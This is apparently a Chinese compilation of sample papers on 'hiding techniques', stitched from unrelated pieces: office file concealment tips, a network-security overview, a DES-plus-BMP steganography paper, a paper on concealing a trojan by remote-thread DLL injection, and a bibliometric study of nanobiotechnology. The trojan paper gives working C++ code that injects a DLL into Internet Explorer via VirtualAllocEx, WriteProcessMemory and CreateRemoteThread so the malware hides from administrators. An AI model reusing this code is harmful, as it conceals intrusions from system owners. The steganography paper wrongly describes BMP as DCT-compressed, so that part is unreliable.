[6]纪震,张基宏,蒋一峰.小波域的扩频数字图像水印算法.电子域信息学报.23(8).509-813.(2001).

隐藏技术论文范文第6篇

在日常生活中,经常会使用不同种类的办公文件,而根据办公文件的性质不同又分为普通级和保密级。对于普通级的文件,其安全系数基本上可以忽略不计,但对于保密级的文件,如何对文件进行必要的加密便成为日常办公过程中需要考虑和实施的问题。

在对办公文件的安全保护措施中,不乏有许许多多的方法策略,有专家级别的,有普通级别的,有专属级别的,也有适合大众级别的,……。为了针对大多数普通的用户,让安全保护策略更适合普通办公人员,我们将探讨日常办公文件的安全保护。对日常办公文件的安全保护主要是对办公文件的伪装及其加密。接下来就对具体的实施方案进行一一讲解。

一、“障眼法”

所谓的“障眼法”,包含两方面的含义,一是让文件的内容得以隐藏,二是让整个文件得以隐藏。

首先探讨“文件内容隐藏”的情况。众所周知,要看见白纸上的字,那是因为字的颜色和纸的颜色形成了对比,如果字的颜色和纸的颜色被设置为一种颜色,就可以暂时隐藏文件中的内容了。比如,在word软件中编写了相关的内容,在编写完毕后,将所编写的内容的颜色设置为纸张的颜色,并将语法错误检测、段落标记显示等功能去除,并将光标至于纸张的第一行第一列,然后保存文件。再次打开文件的时候,如果不太留意,则会误认为这是一份空白文档,以达到隐藏的效果,其实施的效果如图1所示。该方法不足之处在与,虽然隐藏了文字信息,但是对于有经验的操作人员来说,可以通过文件的大小来辨别是否包含有文字信息。

其次探讨“整个文件隐藏”的情况。由于在计算机中的办公文件都根据操作系统的不同存放在指定的逻辑磁盘的存储空间里。因此可以借助操作系统的某些功能,将办公文件进行相应的隐藏。比如,在windows XP操作系统中,可以将办公文件的属性设置为“隐藏”,然后通过“我的电脑”中的“工具”菜单,将其中的“选项”卡中的“不显示隐藏文件”的选项选中,即可将办公文件隐藏起来,如果需要查看该文件,则可在“选项”卡选中“显示隐藏文件”的选项,即可恢复办公文件的隐藏,其实施效果如图2所示。

二、“自加密法”

在计算机领域中,有成千上万种不同的软件,而其中的大部分软件都出于安全角度,提供了或多或少的加密方法,这里通称为“自加密法”。通过“自加密法”,可以使通过某种软件生成的文件多了一层保护,多了一道密码检测的机制。比如,在使用word软件编辑完办公文件后,可以选定“文件”菜单中的“另存为”选项,在弹出的“另存为”对话框中,选择“工具”按钮,在弹出的下拉菜单中选择“安全措施选项”,即可对保存的word办公文件进行相应的加密操作。如图3所示。又如,在使用WINRAR软件进行压缩文件时,可以在选定需要压缩的办公文件的同时,通过选定软件的“常规”选项卡中的“设置密码”按钮,进行相应的密码设置,如图4所示。通过压缩软件这样的设置所导致的结果就是,在进行办公文件压缩包解压的时候,需要先输入正确的密码,否则将无法解压出所需的办公文件。

三、“移花接木法”

所谓的“移花接木法”,是指将对应的办公文件的文件类型改为其他类型,已到达保护办公文件的目的。在计算机系统里,文件的区分只要是通过其扩展名来完成的,常用的扩展名有:.jpg为图片文件,.doc为word文件,.gif为动画文件,.cpp为c++程序文件,……。将办公文件的文件类型由原来的类型改为其他种类的类型,即可达到保护文件的效果。比如:用word软件生成了一个文件名为“机密.doc”的办公文件,如果将其文件的扩展名进行更改,则文件名变化为“机密.jpg”,其文件对应的图标也会随之由原来的word型的图标改变为图片型的图标。对于不知情的人员拿到此办公文件,将会直接双击图标打开文件,将看见一张空白的图片;对于知情人员在拿到此办公文件时,会将文件的扩展名由原来的“.jpg”改为“.doc”,然后再打开文件,即可见文件的内容。

四、“外员法”

所谓的“外员法”,是指借助其他加密软件的力量对办公文件进行相应的加密。目前,在计算机领域中,加密软件可谓是玲琅满目,挑选一种得心应手的加密软件,对需要保护的现代化办公信息进行相应的加密,不愧是一种借助外力,强大自己的好办法。由于不同的加密软件,其加密的操作过程各有千秋,在这里就不再过多阐述。加密软件的选择也可以根据现代化办公的需要进行选择,比如易捷文件夹加密软件,文件加密器,md5加密工具等工具都是目前使用广泛的加密工具。

综上所述,介绍的四种方法是针对现代化办公的信息保护提出的实用有效的策略。在对现代化办公信息进行安全保护的过程中,办公人员可以根据工作的性质以及办公信息的安全等级进行选择,同时也可以将四种方法综合应用,达到最佳的办公信息的安全保护。

(作者单位:四川建筑职业技术学院信息工程系)

隐藏技术论文范文第7篇

论文摘要:随着网络技术的飞速发展和广泛应用,信息安全问题正日益突出显现出来,受到越来越多的关注。文章介绍了网络信息安全的现状.探讨了网络信息安全的内涵,分析了网络信息安全的主要威胁,最后给出了网络信息安全的实现技术和防范措施.以保障计算机网络的信息安全,从而充分发挥计算机网络的作用。

论文关键词:计算机,网络安全,安全管理,密钥安全技术

当今社会.网络已经成为信息交流便利和开放的代名词.然而伴随计算机与通信技术的迅猛发展.网络攻击与防御技术也在循环递升,原本网络固有的优越性、开放性和互联性变成了信息安全隐患的便利桥梁.网络安全已变成越来越棘手的问题在此.笔者仅谈一些关于网络安全及网络攻击的相关知识和一些常用的安全防范技术。

1网络信息安全的内涵

网络安全从其本质上讲就是网络上的信息安全.指网络系统硬件、软件及其系统中数据的安全。网络信息的传输、存储、处理和使用都要求处于安全状态可见.网络安全至少应包括静态安全和动态安全两种静态安全是指信息在没有传输和处理的状态下信息内容的秘密性、完整性和真实性:动态安全是指信息在传输过程中不被篡改、窃取、遗失和破坏。

2网络信息安全的现状

中国互联网络信息中心(CNNIC)的《第23次中国互联网络发展状况统计报告》。报告显示,截至2008年底,中国网民数达到2.98亿.手机网民数超1亿达1.137亿。

Research艾瑞市场咨询根据公安部公共信息网络安全监察局统计数据显示.2006年中国(大陆)病毒造成的主要危害情况:“浏览器配置被修改”是用户提及率最高的选项.达20.9%.其次病毒造成的影响还表现为“数据受损或丢失”18%.“系统使用受限”16.1%.“密码被盗”13.1%.另外“受到病毒非法远程控制”提及率为6.1%“无影响”的只有4.2%。

3安全防范重在管理

在网络安全中.无论从采用的管理模型,还是技术控制,最重要的还是贯彻始终的安全管理管理是多方面的.有信息的管理、人员的管理、制度的管理、机构的管理等.它的作用也是最关键的.是网络安全防范中的灵魂。

在机构或部门中.各层次人员的责任感.对信息安全的认识、理解和重视程度,都与网络安全息息相关所以信息安全管理至少需要组织中的所有雇员的参与.此外还需要供应商、顾客或股东的参与和信息安全的专家建议在信息系统设计阶段就将安全要求和控制一体化考虑进去.则成本会更低、效率会更高那么做好网络信息安全管理.至少应从下面几个方面人手.再结合本部门的情况制定管理策略和措施:

①树立正确的安全意识.要求每个员工都要清楚自己的职责分工如设立专职的系统管理员.进行定时强化培训.对网络运行情况进行定时检测等。

2)有了明确的职责分工.还要保障制度的贯彻落实.要加强监督检查建立严格的考核制度和奖惩机制是必要的。

③对网络的管理要遵循国家的规章制度.维持网络有条不紊地运行。

④应明确网络信息的分类.按等级采取不同级别的安全保护。

4网络信息系统的安全防御

4.1防火墙技术

根据CNCERT/CC调查显示.在各类网络安全技术使用中.防火墙的使用率最高达到76.5%。防火墙的使用比例较高主要是因为它价格比较便宜.易安装.并可在线升级等特点防火墙是设置在被保护网络和外部网络之间的一道屏障,以防止发生不可预测的、潜在破坏性的侵入。它通过监测、限制、更改跨越防火墙的数据流,尽可能地对外部屏蔽网络内部的信息、结构和运行状况.以此来实现网络的安全保护。

4.2认证技术

认证是防止主动攻击的重要技术.它对开放环境中的各种消息系统的安全有重要作用.认证的主要目的有两个:

①验证信息的发送者是真正的主人

2)验证信息的完整性,保证信息在传送过程中未被窜改、重放或延迟等。

4.3信息加密技术

加密是实现信息存储和传输保密性的一种重要手段信息加密的方法有对称密钥加密和非对称密钥加密.两种方法各有所长.可以结合使用.互补长短。

4.4数字水印技术

信息隐藏主要研究如何将某一机密信息秘密隐藏于另一公开的信息中.然后通过公开信息的传输来传递机密信息对信息隐藏而吉.可能的监测者或非法拦截者则难以从公开信息中判断机密信息是否存在.难以截获机密信息.从而能保证机密信息的安全随着网络技术和信息技术的广泛应用.信息隐藏技术的发展有了更加广阔的应用前景。数字水印是信息隐藏技术的一个重要研究方向.它是通过一定的算法将一些标志性信息直接嵌到多媒体内容中.但不影响原内容的价值和使用.并且不能被人的感觉系统觉察或注意到。

4.5入侵检测技术的应用

人侵检测系统(IntrusionDetectionSystem简称IDS)是从多种计算机系统及网络系统中收集信息.再通过这此信息分析入侵特征的网络安全系统IDS被认为是防火墙之后的第二道安全闸门.它能使在入侵攻击对系统发生危害前.检测到入侵攻击.并利用报警与防护系统驱逐入侵攻击:在入侵攻击过程中.能减少入侵攻击所造成的损失:在被入侵攻击后.收集入侵攻击的相关信息.作为防范系统的知识.添加入策略集中.增强系统的防范能力.避免系统再次受到同类型的入侵入侵检测的作用包括威慑、检测、响应、损失情况评估、攻击预测和支持。入侵检测技术是为保证计算机系统的安全而设计与配置的一种能够及时发现并报告系统中未授权或异常现象的技术.是一种用于检测计算机网络中违反安全策略行为的技术。

5结语

隐藏技术论文范文第8篇

【 关键词 】 信息隐藏;DES;载密

【 中图分类号 】 TN915.08 【 文献标识码 】 A

【 Abstract 】 This paper presents a kind of information hiding technology, first of all, through using DES encryption algorithm to encrypt files, and then through information hiding, encrypted file hidden in the BMP image, the encryption image is exactly the same with the original image, the protection of the data is implemented very well.

【 Keywords 】 information hiding; des; encryption image

1 引言

信息隐藏是上世纪90年代开始兴起的信息安全新技术,并成为信息安全技术研究的热点。传统通信领域为了保证传递的信息能够不被窃听或破坏,常采用密码来保护信息,即让窃听者无法看到或听懂,但是这种技术的缺点是告诉窃听者这就是秘密信息,特别是随着计算机技术的发展,密码的安全性受到很大挑战。而新的信息隐藏技术是将需要传递的秘密信息,隐藏在一个普通的非秘密消息当中,再进行传输,这样即使窃听者窃听了传输的信息,也只会将其当成普通的消息,而不会怀疑或者无法得知是否有秘密信息的存在。

BMP是目前最常见的一种图像格式,采用BMP图像作为隐藏消息的载体具有许多优点。首先,BMP图像格式是互联网上图像传输的事实标准,使用这一图像格式比起其它格式来更不会引起怀疑。其次,BMP压缩造成的和秘密消息嵌入带来的图像质量退化是肉眼很难分辨的。为了更好地保证信息的安全性,本文把文件密码加密和信息隐藏这两种技术结合起来:首先利用DES(Data Encryption Standard)把信息文件进行加密,然后把加密后的文件通过选定的BMP图像以特定算法进行隐藏。

2 信息隐藏算法

信息隐藏把前面的加密信息隐藏在无关紧要的载体BMP图片中,第三方并不知道秘密通信这个事实的存在,也就是将秘密信息本身的存在藏起来,即使得到了载密对象,也看不到存在的秘密信息。

隐藏算法通过对BMP图像中选定的DCT系数进行微小变换,以满足特定的关系来表示一个比特的信息。在提取隐藏的信息时,根据隐藏的逆过程抽取比特信息。其特点是隐藏的数据量较少,但是其抵抗几何变换等攻击的能力较强。

在BMP编码中,量化过程是多对一的映射,它是有损变换过程,如果在量化前嵌入秘密消息,会丢失一些信息,从而导致解码时不能正确的获得秘密信息。因此,BMP图像的隐写算法的基本原理必须在量化后进行。由前所述,人眼对亮度信号比对色差信号更敏感,因此本工作将秘密消息与量化后的Y分量的DCT系数的LSB联系起来,从而达到嵌入和提取秘密信息的目的。

隐藏流程如图1所示,具体分为三步骤。

(1)对BMP图像的压缩数据进行解码,得到量化后的DCT系数。

(2)按照隐写算法的嵌入规则对Y分量的DCT系数进行修改,将要隐藏的秘密消息嵌入到其中。

① 首先对载体图像按照8×8的分块方式进行分块。如果载体图像的行数和列数的像素个数不为8的倍数时,则要进行边界扩充处理,使得行数和列数的像素个数都是8的倍数。设载体图像的行数为ImgHeight,列数为ImgWidth,Y在行和列方向上的采样率分别为SampRate_Y_H和SampRate_Y_V,则整幅图像被分为MCUNum = ImgWidth * ImgHeight / (64 * SampRate_Y_H * SampRate_Y_V)个小块。

② 读入待隐信息文件,把其转换为二进制的位流。设待隐信息文件的长度为FileLength。为了以后提取待隐信息,需要传递文件长度,用2个字节表示,可表示的最大数为65535。这样总的需要隐藏的信息长度 TotalFileLength = FileLength + 2,单位是字节。

③ 对一个MCU,按照对Y分量的DCT系数最低位进行修改。查找预定义的矩阵MIDBAND,该矩阵由数值0,1组成,对其中数值为1的位置修改对应DCT的频率系数:如果当前待隐信息的二进制值为0,则把相应位置的频率系数值的最低为修改为0;如果当前待隐信息的二进制值为1,则把相应位置的频率系数值的最低为修改为1。

④ 对待隐信息文件的二进制流按照③的隐藏方案进行信息隐藏。如果待隐信息文件长度大于载体图片的最大隐藏量,则把待隐信息文件按照最大隐藏量进行分段,然后分批按照隐藏流程处理。

(3)对修改后的DCT系数进行编码,重新生成压缩数据,即载密BMP图像。对于上面分批隐藏的,生成系列载密图像如图2所示。

秘密消息的提取过程是嵌入过程的逆过程,提取算法要和隐写算法相对应。

3 结束语

在网络飞速发展的今天,信息隐藏技术的研究具有现实意义。本文将DES加密技术与信息隐藏技术相融合,将加密后的信息隐藏到最常见的BMP图片中,使整个信息隐藏过程达到比较高的安全级别。信息隐藏技术在商业中的广泛应用,是一个跨多领域、多学科(数字信号处理、图像处理、模式识别、数字通信、多媒体技术、密码学、语音处理等)的技术体系,由于它与具体的应用密切相关,这也决定了信息隐藏技术研究成果的多样性以及信息隐藏技术研究的不完善性,仍有许多技术问题需要解决。但可以相信,随着科学技术越来越发达,信息隐藏将有更加广阔的发展空间。

参考文献

[1] 夏煜,郎荣玲,曹卫兵等.基于图像的信息隐藏检测算法和实现技术研究综述[J].计算机研究与发展,2004, 41(4):728-736.

[2] 陈波,谭运猛,吴世忠.信息隐藏技术综述[J].计算机与数字工程, 2005, 33(2):21-23.

[3] 陈雅.基于数字图像的信息隐藏技术综述[J].福建电脑,2008, (2):6-6.

[4] 刘强,方锦清,赵耿,李永.基于FPGA技术的混沌加密系统研究[J]. 物理学报,2012,61(13):130508.

作者简介:

隐藏技术论文范文第9篇

摘要进程的隐藏一直是木马程序设计者不断探求的重要技术,本文采用远程线程技术,通过动态链接库方法,较好地解决了这一问题,通过远程线程将木马作为线程隐藏在其他进程中,从而达到隐藏的目的。

关键字进程线程木马动态链接库

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。

本文分析了WindowsNT/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现WindowsNT/2000系统中进程的隐藏。

1基本原理

在WIN95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在WindowsNT/2000中却完全不同,无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过WindowsNT/2000的任务管理器,WindowsNT/2000的任务管理器均能轻松显示出木马进程,难道在WindowsNT/2000下木马真的再也无法隐藏自己的进程了?我们知道,在WINDOWS系统下,可执行文件主要是Exe和Com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和SOCKET已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在WindowsNT/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2实现方法

为了弄清实现方法,我们必须首先了解Windows系统的另一种"可执行文件"----DLL,DLL是DynamicLinkLibrary(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为DLL文件不能独立运行,所以在进程列表中并不会出现DLL,假设我们编写了一个木马DLL,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马DLL,如果那个进程是可信进程,(例如浏览器程序IEXPLORE.EXE,没人会怀疑它是木马吧?)那么我们编写的DLL作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。

运行DLL方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口Hook、挂接API、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3实施步骤

1)用Process32Next()函数找到宿主进程,获取宿主进程ID,并用

OpenProcess()函数打开宿主进程。

2)用VirtualAllocEx()函数分配远程进程地址空间中的

内存。

3)用WriteProcessMemory()函数将待隐藏的DLL的路径名。

4)拷贝到步骤二已经分配的内存中。

5)用GetProcAddress()函数获取LoadlibraryA()函数的实地址(在kernel32.dll中)。

6)用CreateRemoteThread()函数在远程进程中创建一个线程。

7)它调用正确的LoadlibraryA()函数。

8)为它传递步骤二中分配的内存地址。

4具体实例

下面是在C++Builder4.0环境下编写的运用远程线程技术隐藏木马的程序代码:

#include<vcl.h>

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>//该头文件包涵了进程操作的API函数

#pragmahdrstop

#include"Unit1.h"

#pragmapackage(smart_init)

#pragmaresource"*.dfm"

InsistingpszLibFileName;//存放待隐藏的DLL文件名

HANDLEhProcessSnap=NULL;//进程快照句柄

HANDLEhRemoteProcess;//远程进程句柄

LPVOIDpszLibFileRemote;//远程进程中分配给文件名的空间

HMODULEphmd;//存放kernel32.dll句柄

HANDLEhRemoteThread1=NULL;//存放远程线程句柄

TForm1*Form1;

//---------------------------------------------------------

__fastcallTForm1::TForm1(TComponent*Owner)

:TForm(Owner)

{

}

//---------------------------------------------------------

void__fastcallTForm1::Button1Click(TObject*Sender

{

PROCESSENTRY32pe32={0};

DWORDdwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打开进程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);

exit(0);

}//失败返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32Fi

rst(hProcessSnap,&pe32))//获取第一个进程

{

do{

AnsiStringte;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))

//找到宿主进程,以IEXPLORE.EXE为例

{dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//获取下一个进程

}

else

{

MessageBox(NULL,"取第一个进程失败","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打开远程进程

pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";

//假设hide.dll是待隐藏的进程

intcb=(1+pszLibFileName.Length())*sizeof(char);//计算dll文件名长度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申请存放文件名的空间

BOOLReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名写入申请的空间

phmd=GetModuleHandle("kernel32.dll");

LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//获取动态链接库函数地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//创建远程线

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//关闭远程线程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//关闭进程快照

}

该程序编译后命名为RmtDll.exe,运行时点击界面上的按钮即可。

至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在C++Builder4.0环境下编写并编译了下面的hide.dll作为测试:

nclude<vcl.h>

#include<windows.h>

#pragmahdrstop

#pragmaargsused

BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)

{

charszProcessId[64];

switch(reason)

{

caseDLL_PROCESS_ATTACH:

{//获取当前进程ID

itoa(GetCurrentProcessId(),szProcessId,10);

MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

returnTRUE;

}

当使用RmtDll.exe程序将这个hide.dll嵌入IEXPLORE.EXE进程后假设PID=1208),该测试DLL弹出了1208字样的确认框,同时使用PS工具

也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\WINNT\hide.dll(0x100000000)

……

这证明hide.dll已经在IEXPLORE.EXE进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。

5结束语

进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

参考文献

1JeffreyRichter著王建华、张焕生、侯丽坤等译Windows核心编程机械工业出版社2

隐藏技术论文范文第10篇

[关键词] 学科领域 可视化分析 纳米生物技术 CiteSpace软件

[分类号] G30

纳米生物技术是由纳米技术与生物技术交叉形成的一门新学科领域,是当今国际生物技术领域的研究前沿和热点。发达国家已将纳米生物技术列入其国家重点发展领域,我国“十五”863计划开始设立纳米生物技术重大课题,目前纳米生物技术领域的研究方兴未艾。因此科研人员急切地需要在了解学科领域科技文献基础上,快速筛选、发现隐藏在数据背后的知识内涵,快速借鉴国际前沿性研究成果。

信息可视化(Informaiton Visualization)是近年出现的数据挖掘方法之一,它能很好地利用人类对可视化模型和结构的获取能力,解决科技文献数据量过大、无法快速交流的问题,并通过可视化数据挖掘,发现隐藏在数据和信息背后的含意。

因此,本文将以科学引文索引(SCIE)发表的纳米生物技术论文为数据源,借助CiteSpaee信息可视化软件和分析方法,通过绘制纳米生物技术前沿领域的合著者国家、期刊共被引、作者共被引和共词的可视化图谱,揭示纳米生物技术领域发展过程中知识内涵,发现纳米生物技术领域的研究热点。

1 方法与数据源

1.1 方 法

CiteSpace是美国Drexel大学陈超美博士开发的基于JAVA平台的可视化软件,其一般使用步骤为:①确定一个研究领域;②收集文献全记录数据;③选择时间参数、阈值和算法;④显示可视化图谱。CiteSpace可以对文献全记录数据进行共引网络分析和可视化,使科研用户能够直观地识别学科领域的知识内涵,快速发现学科领域的研究热点和前沿。

1.2 数据源

选择科学引文索引SCIE数据库为数据源,检索策略为:Topic=(nanobiotechnolog*)AND Year Published=(1900-2008),检索结果命中记录399条,引文数据19659条,总被引频次为6330次。最早出现纳米生物技术名词的时间为1995年。因此将1995-2008年期间,纳米生物技术领域399篇论文的全记录信息导入CiteSpace软件,采用SCIE的分析功能和CiteSpace软件(2009年3月20日2.2.R1 Webstart版本)进行年代、地区分布、合著者国家、期刊共被引、作者共被引和共词信息分析,绘制网络可视化图谱。

2 纳米生物技术领域的论文分布情况

2.1 时间分布

从1995-2008年期间纳米生物技术领域论文年代分布分析结果可见:1995-2002年间,每年发表的论文都是以个位数计,从2003年开始有了较快速的增长,达到28篇,此后纳米生物技术领域的论文数量一直保持较快增长水平,2008年量达到92篇,如图1所示:

2.2 地区分布

从1995-2008年期间纳米生物技术领域论文数量TOPIO的国家分布统计结果可见:美国在纳米生物技术领域数量最多,为111篇,远高于其他国家;其次为德国、日本、英国;中国位居第9位(见图2)。

3 纳米生物技术领域前沿的可视化图谱

3.1 合著者国家分析

选择关键路径(pathfinder)算法,网络节点为国家,时间区选择2年,阈值为(2,2,5),(3,2,10),(3,2,15),绘制合著者国家网络可视化图谱,如图3所示:

图谱中不同大小圆环表示频次(freq),不同颜色表示不同的年份,最外层的紫色圈表示中心性(central-ity)。在纳米生物技术领域方面,美国的节点圆圈远大于其他国家,说明美国在纳米生物技术领域中的合著者频次最高(freq=104)。美国与德国、加拿大和瑞士在药物输送(drug-delivery)方面有合作;意大利和加拿大在碳纳米管(earbon-nanotubes)方面有合作;中国与德国在个体化用药(personalized-medicine)方面有合作。日本与以色列在杂交系统(hybrid-systems)方面有合作,而且这两个国家与其他国家几乎没有合作。另外美国在马达蛋白(motor-proteins)研究方面,中国在纳米金(gold-nanoparieles)研究方面开展了自己独特的研究。

从节点中心性看,美国在网络中的中心性(central-ity=0.5)也是所有节点中最大的,而且遥遥领先于其他国家,显示了美国在纳米生物技术领域研究的核心地位,如表1所示:

3.2 期刊共被引分析

选择关键路径(pathfinder)算法,网络节点为期刊,时间区为3年,阈值为(5,5,30),(10,10,30),(IO,10,30),绘制期刊共被引可视化网络图谱,如图4所示:

从图4、表2中可以看出,纳米生物技术领域共被引频次高于50次的期刊有30种,其中,位于前五位的分别是:SCIENCE、PNATL ACAD SCI USA、NATURE、JAM CHEM SOC和ANGEW CHEM[NT EDIT。而中心度位于前五位的期刊分别是:Science、ANGEW CHEMINT EDIT、BIOPHYS J、ANAL CHEM、NAT BIOTECHN―OL,与期刊共被引频次排在前五位的有所不同。因此科研用户在关注学科领域核心期刊的时候,在关注发文量高的期刊同时,还应关注共被引频次以及中心度也高的期刊,才能够全面把握学科领域最前沿的研究成果。

3.3 作者共被引分析

选择关键路径(pathfinder)算法,网络节点为作者,时间区为3年,阈值为(2,1,20),(3,3,30),(5,4,30),绘制作者共被引可视化网络图谱,如图5所示:

从图5、表3中可以看出,纳米生物技术领域单篇文献共引频次高于20次作者有10位,其中NIEMEY-ER CM和SEEMAN NC的文献共引频次和中心度都远远高于其他作者,也说明了他们在纳米生物技术领域的重要地位,是学科领域的领军人物。

3.4 共词分析――纳米生物技术研究热点和前沿分析

选择关键路径(pathfinder)算法,网络节点为关键词,时间区为2年,阈值为(1,1,20),(3,3,25),(4,4,30),绘制共词可视化网络图谱,如图6所示:

CiteSpace还可以根据某段时间内关键词共现频次,将变化率高的词从大量的主题词中探测出来,称为突现词,用红色字显示。

从图6、表4中可以看出,纳米生物技术领域共现频次高于10的关键词有29个,其中被引频次位于前五位的分别是:纳米生物技术(nanobiotechnology)、纳米技术(nanotechnology)、蛋白质(protem’s)、药物输送(drug delivery)和纳米粒子(nanoparticles)。通过高频出现的关键词在共词网络图谱中展示的共现频次(freq)和中心性(centrality),在一定程度上揭示了纳米生物技术领域的研究热点。

根据关键词频次变化率,软件从大量的主题词中还探测到纳米生物技术领域研究前沿的5个突现词分别是:药物输送(drug-delivery);碳纳米管(carbon―nano-tubes);纳米药物(nanomedicine);个性化用药(person-alized-medicine);马达蛋白(motor-proteins)。

上一篇:税收优先权论文范文 下一篇:校本教研论文范文